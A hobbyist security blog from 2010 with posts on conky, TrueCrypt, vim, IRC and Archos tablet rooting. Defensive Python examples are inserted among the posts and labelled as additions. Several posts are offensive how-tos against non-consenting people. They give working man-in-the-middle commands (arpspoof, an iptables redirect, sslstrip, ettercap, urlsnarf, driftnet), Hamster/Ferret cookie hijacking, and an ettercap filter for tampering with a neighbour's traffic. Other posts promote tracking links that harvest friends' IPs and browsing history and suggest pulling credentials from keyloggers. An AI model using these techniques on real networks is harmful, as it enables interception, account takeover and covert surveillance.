Friday, December 31, 2010

Shell script to check IP (For use with conky)

Well, as I used conky on BT4 I began to like having my private IP displayed, so I decided to look at the script it used, and it's as simple as this: make a file on your desktop named ip.sh and add the following:

#!/bin/bash
# Fetch the checkip.dyndns.org page and strip everything except the address it reports
wget -q -O - checkip.dyndns.org|sed -e 's/.*Current IP Address: //' -e 's/<.*$//'

Save this file and make it executable with the following command:

chmod 775 ip.sh

This lets you read, write and execute the file (775 also lets everyone else read and run it). You can now try it out with "./ip.sh" and it should display your IP in the shell. If so, it's ready for use with conky. To use a shell script in conky you need to add the following line to your .conkyrc:

${execi 300 /home/youruser/Desktop/ip.sh}

If all's well, it's displaying your IP now.
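conky's execi runs any executable, so ip.sh can be swapped for a script that checks what it is about to display. The following is an added example, not the blog's script: it applies the same "Current IP Address:" extraction but only prints a syntactically valid IPv4 address, so an error page or altered response shows up as "n/a" in conky instead of arbitrary text, and it times out rather than hanging the execi. The sample response body is constructed.

```python
#!/usr/bin/env python3
import ipaddress
import re
import urllib.request

# Constructed sample of the checkip.dyndns.org response the one-liner above scrapes
SAMPLE_BODY = ('<html><head><title>Current IP Check</title></head>'
               '<body>Current IP Address: 203.0.113.7</body></html>')

_IP_RE = re.compile(r'Current IP Address:\s*([^<\s]+)')


def extract_ip(body):
    """Return the reported IPv4 address, or None if the page holds no valid one.

    Validating here means an error page, a truncated body or an injected string
    yields nothing rather than being pasted into the desktop as-is.
    """
    m = _IP_RE.search(body)
    if not m:
        return None
    try:
        addr = ipaddress.ip_address(m.group(1))
    except ValueError:
        return None
    return str(addr) if addr.version == 4 else None


def fetch_public_ip(url='http://checkip.dyndns.org', timeout=5):
    """Fetch the page with a timeout so a dead network cannot stall conky."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read(4096).decode('ascii', 'replace')
    except (OSError, ValueError):
        return None
    return extract_ip(body)


if __name__ == '__main__':
    # ${execi 300 /home/youruser/Desktop/ip.py} displays whatever this prints
    print(fetch_public_ip() or 'n/a')
```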

Wednesday, December 22, 2010

Hamster & Ferret

"Hamster is a tool for HTTP session hijacking with passive sniffing. It eavesdrops on a network, captures the session cookies, then imports them into the browser to allow you to hijack their session. There is a more complete description in the help section."


These tools make a great addition when performing the MITM attack I demonstrated in the SSLStrip video.

So say we got everything set up like we did in the video; we can fire these up by going to the directory they're installed in (which is /pentest/sniffers/hamster/ for BT4), then start up ferret like so: "./ferret -i wlan0"

Then you can start hamster next with "./hamster", open your browser of choice and set the proxy to "127.0.0.1 : 1234" like it says. Type hamster in the URL bar, select your interface and there you go. Easy as that.

Download these tools with apt-get install hamster or download here

TrueCrypt

Main Features: read more here - http://www.truecrypt.org/docs/

Download using the apt-get command or - http://www.truecrypt.org/downloads

Monday, December 20, 2010

Crypting text with my new favorite text editor, VIM.

So this is extremely simple, if you know about it, which I didn't until just now when looking for a simple way to encrypt text data. Now it's as simple as this: when starting a new file, run this command to have it encrypted as well:

"vim -x filename"

This will prompt you for the password you would like to use to encrypt it. To save the file once you've finished, press "ctrl o" then ":w filename".

And you're done. Though I'm not all too sure how secure the encryption is, so I still suggest using TrueCrypt.

You can get vim with the "apt-get install vim" command.
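Whether "vim -x" is secure depends on the cryptmethod: Vim stamps each encrypted file with a 12-byte header, VimCrypt~01! for the default PkZip-style cipher (weak), VimCrypt~02! for the blowfish method added in Vim 7.3, and VimCrypt~03! for blowfish2, which fixes a weakness in the first blowfish implementation. The following is an added example, not from the post or from Vim, that reads that header to report which method a file uses and flags files that are weakly protected or not encrypted at all; the sample headers are constructed.

```python
# Vim's documented encryption headers, mapped to the 'cryptmethod' option value
_VIM_CRYPT_METHODS = {
    b'VimCrypt~01!': 'zip',        # PkZip-compatible stream cipher, Vim's default
    b'VimCrypt~02!': 'blowfish',   # Vim 7.3; has a known weakness
    b'VimCrypt~03!': 'blowfish2',  # Vim 7.4.399+, the method Vim's docs recommend
}
WEAK_METHODS = {'zip', 'blowfish'}


def vim_crypt_method(header):
    """Map the first bytes of a file to its cryptmethod ('plaintext' if no header)."""
    return _VIM_CRYPT_METHODS.get(bytes(header[:12]), 'plaintext')


def audit_headers(samples):
    """samples: {name: first bytes of the file}.

    Returns ({name: method}, [names that are plaintext or use a weak method])."""
    report, weak = {}, []
    for name, header in samples.items():
        method = vim_crypt_method(header)
        report[name] = method
        if method == 'plaintext' or method in WEAK_METHODS:
            weak.append(name)
    return report, weak


def audit_files(paths):
    """Same check over real files: only the 12-byte header is read."""
    samples = {}
    for path in paths:
        with open(path, 'rb') as fh:
            samples[path] = fh.read(12)
    return audit_headers(samples)
```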

Thursday, December 16, 2010

Quick Python Script/Example For Finding The Mac and IP Of Users On Your LAN.

Well, I wanted a quicker way to check what hosts are on my LAN other than pinging/nmap/opening a browser and generating a bunch of data. So I made this quick script to save time and display it in a shell. Very basic, but it may serve someone some good as an example. I'm still learning, so if I improve it (likely) then I'll post an update.

 
import re
import urllib.request

# Fetch the router's client table page (fill in the URL for your router).
# Updated from the Python 2 original: urllib.urlopen and print statements.
users = urllib.request.urlopen("Your Routers Client Table URL").read().decode("utf-8", "replace")

# Every dotted-quad in the page
ips = re.findall(r'(?:\d{1,3}\.){3}\d{1,3}', users)
print("[=>Live Hosts<=]")
print(ips)

# Every MAC address, colon- or dash-separated (the original class also matched a literal '|')
mac_re = re.compile(r'([a-fA-F0-9]{2}[:\-]){5}[a-fA-F0-9]{2}')
for m in mac_re.finditer(users):   # finditer is always truthy, so iterate rather than test it
    print(m.group())
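An added example (not the author's script) that goes one step further than two separate lists: it pairs each table row's IP with its MAC and compares the result against a baseline of devices you recognise, so an unfamiliar host on the LAN stands out. The HTML table and the KNOWN_HOSTS baseline are constructed; on a real router, pass parse_clients the page fetched as in the script above.

```python
import re

# Constructed client-table HTML in the style a home router's admin page returns
SAMPLE_TABLE = """
<table id="clients">
<tr><th>Host</th><th>IP</th><th>MAC</th></tr>
<tr><td>laptop</td><td>192.168.1.9</td><td>00:11:22:33:44:55</td></tr>
<tr><td>phone</td><td>192.168.1.12</td><td>AA-BB-CC-DD-EE-01</td></tr>
<tr><td>unknown</td><td>192.168.1.77</td><td>de:ad:be:ef:00:01</td></tr>
</table>
"""

# Devices the owner recognises, keyed by normalised MAC (constructed baseline)
KNOWN_HOSTS = {
    '00:11:22:33:44:55': 'laptop',
    'aa:bb:cc:dd:ee:01': 'phone',
}

IP_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
MAC_RE = re.compile(r'\b(?:[0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}\b')
ROW_RE = re.compile(r'<tr>(.*?)</tr>', re.S | re.I)


def normalise_mac(mac):
    """Lower-case, colon-separated form so 'AA-BB-..' and 'aa:bb:..' compare equal."""
    return mac.lower().replace('-', ':')


def parse_clients(html):
    """Return {mac: ip}, pairing the IP and MAC found in the same table row
    instead of two independent lists that can drift out of step."""
    clients = {}
    for row in ROW_RE.findall(html):
        ip, mac = IP_RE.search(row), MAC_RE.search(row)
        if ip and mac:
            clients[normalise_mac(mac.group())] = ip.group()
    return clients


def find_unknown(clients, known):
    """Sorted (mac, ip) pairs for hosts whose MAC is not in the baseline."""
    return sorted((mac, ip) for mac, ip in clients.items() if mac not in known)


if __name__ == '__main__':
    for mac, ip in find_unknown(parse_clients(SAMPLE_TABLE), KNOWN_HOSTS):
        print('unknown host %s at %s' % (mac, ip))
```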

Example Picture;

Tuesday, December 7, 2010

PacketFountain: Network Sniffing Screensaver

Well, if you're using Windows and you're getting tired of your screensaver you should check this out. It's a packet-sniffing screensaver! Not the cleanest looking in the world, but it's much better than a flying box or some pipes. It's called "PacketFountain" and was put together by IronGeek. It's written in VB6 and uses the WinPcap wrapper.


Steps to install

1. copy ./bin/PacketFountain.scr to windows directory (c:\windows\).
2. copy ./bin/VBPCAP.DLL to windows\system32 directory (c:\windows\system32).
3. Install Winpcap from http://winpcap.polito.it/ .
4. Go to Display Properties->Screen Saver and choose PacketFountain.
5. Click the settings button and choose your network card, number of packets, active monitors and speed.

I personally had an issue with changing the settings, but it's not a big deal.


Download

IronGeek's DecaffeinatID

Well, I've been playing around a bit with a Windows VM that acts as a honeypot/IDS for my network, which I can remotely monitor with my Archos7 via VNC. One of the apps I've come across is "DecaffeinatID", which is a very simple IDS/ARP watcher. I'd never heard of it before and found it quite a nice addition to my arsenal, so I figured I would spread the info. Here's a little bit of info about it, taken from IronGeek.

This project started because I (IronGeek) wanted a simple ARP Watch like application for Windows. In a short matter of time, feature creep set in. DecaffeinatID is a simple little app that acts as an Intrusion Detection System (more of a log watcher really) to notify the user whenever fellow users at their local WiFi hotspot/ LAN are up to the kind of "reindeer games" that often happen at coffee shops and hacker cons. It's not meant to be a replacement for something more feature rich (but complicated) like Snort. DecaffeinatID watches the Windows logs for three main things and pops up a message in the Windows Systray when it sees any of the following:

New or changed ARP table entries
Think of this as a poor man's ARPWatch for Windows. The IDS gives a special alert whenever it sees the MAC address of the IP gateway change.

New events in security log
This will let you know about attempted and successful logins, assuming you have set up auditing for such things in your local security settings.

New events in the firewall log
DecaffeinatID will read your Windows firewall log (if you have one) and list events.

You can find more info here
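The first of those three checks is the one that catches the arpspoof step from the MITM post below. As an added example (not IronGeek's code, and Linux rather than Windows), here is the same ARP watch built on /proc/net/arp: it diffs two snapshots, reports new or changed entries, and gives a changed gateway MAC its own alert. Both snapshots and the GATEWAY address are constructed; on a real host take the gateway from "ip route".

```python
import time

# Constructed /proc/net/arp snapshots: the second shows the gateway's MAC changing
# and a new host appearing, the two events the ARP watch is meant to surface
ARP_BEFORE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         00:11:22:33:44:01     *        wlan0
192.168.1.9      0x1         0x2         00:11:22:33:44:09     *        wlan0
"""
ARP_AFTER = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         de:ad:be:ef:00:09     *        wlan0
192.168.1.9      0x1         0x2         00:11:22:33:44:09     *        wlan0
192.168.1.20     0x1         0x2         00:11:22:33:44:20     *        wlan0
"""
GATEWAY = '192.168.1.1'   # assumed value; read it from `ip route` on a real host


def parse_arp(text):
    """Return {ip: mac} for complete entries (flags 0x2); the header line and
    incomplete entries (flags 0x0, no MAC resolved yet) are skipped."""
    table = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 4 and fields[2] == '0x2':
            table[fields[0]] = fields[3].lower()
    return table


def diff_arp(old, new, gateway):
    """Alerts for entries that appeared or changed MAC between two snapshots.
    A changed gateway MAC is the classic sign of ARP poisoning, so it gets its own tag."""
    alerts = []
    for ip, mac in new.items():
        if ip not in old:
            alerts.append('NEW %s is at %s' % (ip, mac))
        elif old[ip] != mac:
            tag = 'GATEWAY-CHANGE' if ip == gateway else 'CHANGE'
            alerts.append('%s %s moved from %s to %s' % (tag, ip, old[ip], mac))
    return alerts


def watch(path='/proc/net/arp', interval=5, gateway=GATEWAY):
    """Poll the live table on Linux and print alerts as they happen (Ctrl-C to stop)."""
    with open(path) as fh:
        old = parse_arp(fh.read())
    while True:
        time.sleep(interval)
        with open(path) as fh:
            new = parse_arp(fh.read())
        for alert in diff_arp(old, new, gateway):
            print(alert)
        old = new
```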

Thursday, December 2, 2010

Ettercap Porn Filter

Ever get tired of your little brother or your perverted neighbor watching porn and wasting perfectly good bandwidth on nonsense? Well, here's a fun solution to that. Below is an ettercap filter I tossed together to play around with. To create an ettercap filter you first have to create a new file to begin scripting; in this case it will be "hak.filter". Once you have your desired filter scripted, you can compile it using etterfilter and then it's ready for use.

Below is an example filter for people to play with and get an idea of how they work. What it does is quite obvious: it changes the word porn to a link saying "You Need Help" which takes them to "www.no-porn.com", a site for porn addiction. It also changes a few other words.


You can find the script here;

http://pastebin.com/L7PCPNap

To compile it, simply make a new file called hak.filter, then once you have your desired script ready, run this command in a terminal:

etterfilter hak.filter -o name.ef

At this point the filter is ready for use, to use it simply add a "-F name.ef" when running ettercap.

Example usage: ettercap -TM arp:remote // // -F name.ef -i wlan0

Friday, November 26, 2010

Man In The Middle tutorial - SSLStrip and Arp Poisoning.

Linux Distro
Tools used
  • Ettercap
  • SSLStrip
  • Dsniff suite (URLSnarf)
  • Driftnet
  • Arpspoof
  • fping
  • nano
Commands
  • nano /etc/etter.conf
  • fping -a -g 192.168.1.9 192.168.1.1 -s >hosts
  • sslstrip -a -k -f
  • iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
  • echo "1" > /proc/sys/net/ipv4/ip_forward
  • arpspoof -i wlan0 -t 192.168.1.9 192.168.1.1
  • ettercap -Tq -L etterlogs -i wlan0
  • urlsnarf -vvv -i wlan0
  • driftnet -v -i wlan0 

Tuesday, November 23, 2010

A possible fix for hopeless Archos7's that won't stop restarting

Well, I recently had an Archos7 that would not stop resetting when I booted it. The damn thing would reboot the second I touched the screen, and in some cases before it could even boot. I'm not sure if this will solve others' problems, but I simply put a new ROM (Update.img) on an SD card and, the moment it booted (took a few tries), slipped the card in and quickly hit the Update button before it had the chance to reboot. Just like that, it worked perfectly.

Friday, October 29, 2010

Hacking the Archos 7 Home Tablet (Getting Google apps& root!)


All the builds are currently for the 8GB version. If you have a 2GB version take EXTRA caution and be sure you want to be the first to try this.

Now that that's out of the way, let's begin. Below is the link for a rooted version of my ROM, which also includes Google Apps as seen in "Operation Unbrickable: The quest for Google Apps". Let me explain what "rooted" means. To the best of what I have been able to find, rooted allows apps to run as superuser or "su" or sudo, all of which means that they are running as the root user. This can play havoc on your device if you aren't VERY careful and pay attention to what apps are asking for what permission. To help fight illicit apps asking for su I included the superuser app in this build. This app will pop up whenever an app asks for su permissions and you can allow or deny, and there is also an option to always allow or always deny the app.

This build also has the contacts.apk file pre-installed but you will still need to reinstall the contactsprovider.apk file in order to get Google contacts to sync properly.

The good:
- All Google Apps work
- Apps that require root work!!!
- ADB SU works (after typing su in ADB be sure you click accept in the superuser app pop-up on the device)

The not so good:
- Still need to reinstall googlecontactsprovider.apk to get contacts sync to work

The bad:
- None that I know of (prepares to put foot in mouth)

Still to come:
- Increased app space
- Apps2SD

Added files not in standard Archos build:
- All the files for the market and apps
- SuperUser.apk
- special su file in system/bin chmod'd to 06755
- edited su file in system/xbin chmod'd to 755 and chown'd to root:root

V.2 IMG Download - www.mediafire.com/file/2oliyzznmqo/update.img

Version 0.2.1 with increased app space
This version is still in the works but I wanted to get it out. The difference between this and 0.2 is that this image contains a 290MB app space so you can install 5 x the apps. The down side is the install process. This is not for everyone! I do not have a new device to test this on. My drive was partitioned several different times several different ways before I got a working image for me so I can only HOPE this will work for you. Only do this if you know how to use the RockChip flasher until you hear that it works for other folks.

Other changes to this image:
- usb debugging is enabled by default
- new default background matching the boot screen thanks to pmarin

***WARNING***
You WILL lose everything on your device that isn't on an SDHC card.

Windows Instructions:
1. flash device with updated image as per normal procedure
2. when the device boots up, insert usb cable and mount the drive. If you are in windows, you should get a message saying that the drive needs to be formatted before it can be used. Go ahead and format it with default settings (fat32).
3. wait 45 minutes
4. flash device again with same 0.2.1 image.
5. report back here any issues.

*nix Instructions (thanks quindo):
same as windows except for format procedure below
- Use 'dmesg' to find out which devices are added to your system (in my case sdb and sdc)
- Format the second device (sdc in my case) with the command: mkfs.vfat -F 32 -I /dev/sdc

Download version 0.2.1 IMG here - http://www.mediafire.com/?y5zy2hwotilhjmq


-----------------------------------------------------------------------------------------------------------------------------------

V.3 IMG Download - http://www.mediafire.com/file/mmyfnwnwmdm/update.img

Load this update.img into the root of your A7HT, install it and you will have Google Apps.

The Good:
Android Market, Gmail, GMaps, Google Talk and Google Calendar works.

The Not so good:
The install of Google contacts sync is a work around.

The Bad:
None that I know of. Hopefully fixed it all.

Risk of losing all your data you already have set up:
100%. This is a complete wipe of what is there and installing a brand new image.

Instructions:

  1. Load the update.img linked at bottom of thread into the root of your A7HT.
  2. Turn off USB sharing and you will be prompted to install an update.
  3. Click install and A7 will reboot
  4. Install the update and eventually go back to the setup screen
  5. Go into settings, turn on WiFi and connect to your router
  6. Once it is connected:
    a. Open any of the Google apps (market, Gmail, Calendar)
    b. Go through the Google setup screens.
    c. Upon completion install: contacts.apk and GoogleContactsProvider.apk.
    Note: GoogleContactsProvider.apk will give you some message about it being a system app that is already installed.... Click OK and continue.
  7. All is well with the world.
  Note: Yes, I know you will get an additional app called dialer. You'll just have to deal with it as it's part of the contacts.

A big thanks to Dom at http://forum.archosfans.com/

And this app for one-click rooting seems to be working for a temp root;
http://www.androidpolice.com/2010/08/10/universal-androot-app-offers-one-click-root-on-a-multitude-of-devices-g1-nexus-one-droid-droid-x-hero-x10-streak-and-more/

Thursday, September 9, 2010

Kismet - An excellent tool for your arsenal.


Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.

Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, decloaking) hidden networks, and inferring the presence of nonbeaconing networks via data traffic.

Thursday, September 2, 2010

Driftnet - See what pictures people on your network are looking at.

Inspired by EtherPEG (though, not owning an Apple Macintosh, I've never actually seen it in operation), Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.

In an experimental enhancement, driftnet now picks out MPEG audio streams from network traffic and tries to play them. You can also now use driftnet with Jamie Zawinski's webcollage, so that it can run as a screen saver.

Saturday, August 21, 2010

Friday, August 20, 2010

Get someone's IP/System info with nothing more than a link.


Here's another useful site; this one can be used to collect a person's IP/OS/Browser/etc. with nothing more than a URL. It can also redirect to a specific site, so it would be perfect to use with the other site I posted about (http://hyfbt.com)

Thus collecting even more data. You could get someone's IP/OS/Browser/etc. AND also get their browsing history.

Check it out here, the source is also available so you could implement this into your own site.

Thursday, August 19, 2010

irssi, my favorite IRC Client.

Irssi is a terminal-based IRC client for UNIX systems. It also supports the SILC and ICB protocols via plugins. Below is a screenshot of mine (it's extremely plain).


Greatest features

You might be wondering what makes Irssi such an easy and comfortable client to use; Joost Vunderink wrote a summary of the most beneficial Irssi features.
  • Autologging
    Irssi will automatically log any channels, queries or special windows that you want. The logfiles will be separated per IRC network, and even log rotation is supported. Log file formats, themes and destination directories can be easily configured with the Irssi log settings.
  • Formats and themes
    Theming is a popular item in today's desktop environments; it's an easy yet powerful way to customize your Irssi client's look and feel. Irssi's formatting is modular, which means you can just change the appearance of the objects and all items containing that object will change into that format.
  • Perl scripting
    Perl is one of the most used programming languages around the globe and integrating Perl into applications means flexible and powerful scripting capabilities. The entire behavior and appearance of Irssi can be modified within these Perl scripts. Irssi provides a script archive with many contributed Irssi scripts which provide both useful extra features and the required assistance to make your own scripts.
  • Irssi-proxy
    This is much more than just a bouncer. Irssi-proxy is a plugin which allows you to bind a port to each IRC server you are connected to. This means that instead of having to remember to identify with a password, you can just connect to the Irssi-proxy with a server password. The copy of Irssi running the proxy works just as a normal client which you can use, but you can also connect one or more clients to it to share the connections. Using Irssi as a proxy has the major advantage of Irssi's power as an IRC client. You never have to worry about losing your connection to IRC. Even if you don't want to use Irssi as a client, I can strongly recommend it as a proxy because you can just connect to it with any IRC client by just connecting to the specified port instead of SSH-ing to the machine that your Irssi is running on.

You can download irssi from here, or use the repositories.

Learning Python (Again)

Well, I've got some free time on my hands so I've been playing around with Python again. I made this script to listen on a specified port for connections. When someone tries to connect (an attacker using netcat/telnet or running noisy scans, perhaps) it will log the time and the IP/port they connected from. This script could still use a lot of improvements, but it serves the purpose I intended it for. I will most likely update it at some point soon, but here it is as of now. Be sure to port forward if you use a router and want to use the script outside the LAN.
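The author's script itself did not survive on this page. What follows is an added example of the same idea, not the author's code: a listener that accepts on a port nothing legitimate uses, records the time and source IP/port, and closes the connection without answering, so it can only ever log a knock. The port in the main block is a constructed value; the loopback self-test uses port 0 so the OS picks a free one.

```python
import datetime
import socket
import threading


def format_entry(addr, when):
    """One log line: ISO timestamp, remote IP and the remote (source) port."""
    return '%s connection from %s:%d' % (when.isoformat(timespec='seconds'), addr[0], addr[1])


class ConnectionLogger:
    """Bind, listen, and record every connection attempt without ever sending data."""

    def __init__(self, host='0.0.0.0', port=0, logfile=None):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]   # the real port, useful when port=0
        self.logfile = logfile
        self.entries = []

    def serve(self, max_conns=None):
        """Accept connections until max_conns have been logged (None = run forever)."""
        while max_conns is None or len(self.entries) < max_conns:
            conn, addr = self.sock.accept()
            conn.close()                          # no banner, no reply: nothing to exploit
            entry = format_entry(addr, datetime.datetime.now())
            self.entries.append(entry)
            if self.logfile:
                with open(self.logfile, 'a') as fh:
                    fh.write(entry + '\n')
        self.sock.close()

    def serve_in_background(self, max_conns=None):
        """Run serve() on a daemon thread and return the thread."""
        t = threading.Thread(target=self.serve, kwargs={'max_conns': max_conns}, daemon=True)
        t.start()
        return t


def knock(host, port):
    """Open and immediately close one connection; used to self-test over loopback."""
    socket.create_connection((host, port)).close()


if __name__ == '__main__':
    # 31337 is a constructed example port; pick an unused one and forward it on the router
    ConnectionLogger(port=31337, logfile='connections.log').serve()
```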

See what 'explicit' sites (and more) your friends have been on.

Well I came across this while checking out some forums and thought it was worth a post. http://www.haveyourfriendsbeenthere.com/

As simple as sending a link to your friend.

Keep your keystrokes secure.

I figured while I was talking about keyloggers I'd take a moment and mention 'Keyscrambler'. It encrypts the keystrokes deep in the kernel, preventing the attacker from reading them and leaving him with encrypted gibberish.

You can read more and download 'Keyscrambler' here

Getting Login Credentials From Unencrypted Keyloggers.

Well, to start off this blog I'll be writing a simple tutorial using the tool 'Bintext'. It's very simple to use and this tutorial will be very basic. Start off by downloading 'Bintext' from here

Now open it up and you should see this (screenshot not included in this copy):

As you can see it's pretty straightforward. Browse your system for the keylogger you wish to check for logins and then hit 'Go'.

At this point it should look like this (screenshot not included in this copy):

Now you can type in a variety of things to search for; the ones I've had the best results with are 'smtp', 'gmail', 'ftp' and '.com'. Keep in mind it's case sensitive.

Congratulations, you just dealt some karma. ^.^ A good place to find unencrypted keyloggers is YouTube; just search obvious stuff (such as steam game added) under the 'Search options->Today' search settings. Just be careful not to infect yourself by accident.
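What Bintext does in the screenshots above is a printable-string scan plus a search box. As an added example, not Bintext and not the blog's code, here is that triage step scripted: extract ASCII runs from a sample the way strings/Bintext do, then flag the ones containing the indicators the post recommends, which is how you identify the mail or FTP host a logger reports to so it can be blocked and reported. SAMPLE_BINARY is a constructed stand-in for a logger executable, not a real sample.

```python
import re

# Constructed stand-in for a keylogger binary: code bytes with its configuration
# embedded in the clear, which is what makes an 'unencrypted' logger give up its settings
SAMPLE_BINARY = (b'MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00'
                 b'smtp.example.com\x00\x00\x00logger@example.com\x00\x00'
                 b'ftp.example.net\x00\x01\x02\x03\xe8\x00\x00\x00GetAsyncKeyState\x00'
                 b'\xcc\xcc\xcc\xcc\x00x\x00y\x00z\x00')

# The same terms the post suggests typing into Bintext, matched case-insensitively here
INDICATORS = ('smtp', 'gmail', 'ftp', '.com', 'pass')


def extract_strings(data, min_len=4):
    """Printable ASCII runs of at least min_len bytes, in file order."""
    run = re.compile(rb'[\x20-\x7e]{%d,}' % min_len)
    return [m.group().decode('ascii') for m in run.finditer(data)]


def flag_indicators(strings, indicators=INDICATORS):
    """Return {string: [indicators it contains]} for every string that matches at least one."""
    hits = {}
    for s in strings:
        matched = [i for i in indicators if i in s.lower()]
        if matched:
            hits[s] = matched
    return hits


def triage(path):
    """Run both steps over a file on disk and return the flagged strings."""
    with open(path, 'rb') as fh:
        return flag_indicators(extract_strings(fh.read()))


if __name__ == '__main__':
    for s, why in flag_indicators(extract_strings(SAMPLE_BINARY)).items():
        print('%-24s %s' % (s, ', '.join(why)))
```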